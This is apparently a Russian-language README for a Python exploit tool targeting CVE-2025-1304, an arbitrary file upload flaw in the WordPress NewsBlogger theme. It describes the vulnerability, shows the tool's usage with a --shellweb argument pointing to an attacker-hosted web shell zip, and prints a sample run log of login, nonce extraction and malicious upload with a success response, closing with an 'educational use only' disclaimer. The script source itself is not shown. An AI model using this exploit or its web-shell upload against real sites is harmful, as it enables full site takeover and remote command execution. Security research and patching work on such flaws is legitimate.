
Тема WordPress NewsBlogger <= 0.2.5.1 уязвима для произвольной загрузки файлов
CVSS Score: 8.8 (Высокий)
Vulnerability Type: Произвольная загрузка файлов
Component: Тема WordPress
CVE ID: CVE-2025-1304
Тема WordPress NewsBlogger (версии <= 0.2.5.1) уязвима к произвольной загрузке файлов через панель приветствия администратора.
Эта уязвимость позволяет любому аутентифицированному пользователю, включая тех, у кого минимальная роль Подписчик, загрузить вредоносный .zip-архив, содержащий веб-шелл.
Загрузка происходит через непроверенное поле URL плагина, которое не может должным образом проверить содержимое или тип загружаемого файла.
Успешная атака может привести к полной компрометации веб-сайта, включая удаленное выполнение команд и повышение привилегий.
Этот скрипт Python автоматизирует эксплуатацию уязвимости путем:
nonce из уязвимой страницы приветствия.python CVE-2025-1304.py -h
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
Тема WordPress NewsBlogger уязвима к произвольной загрузке файлов #Автор: Nxploited (Khaled Alenazi)
options:
-h, --help показать это справочное сообщение и выйти
--url, -u URL Базовый URL цели (напр., http://target/wordpress)
--username, -un USERNAME Имя пользователя администратора WordPress
--password, -p PASSWORD Пароль администратора WordPress
--shellweb, -shell SHELLWEB
Прямой URL на вредоносный zip-архив с шеллом (напр., http://attacker.com/shell.zip)
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
Этот код предоставлен только для образовательных и авторизованных тестов безопасности.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.
Автор: Nxploited (Khaled Alenazi)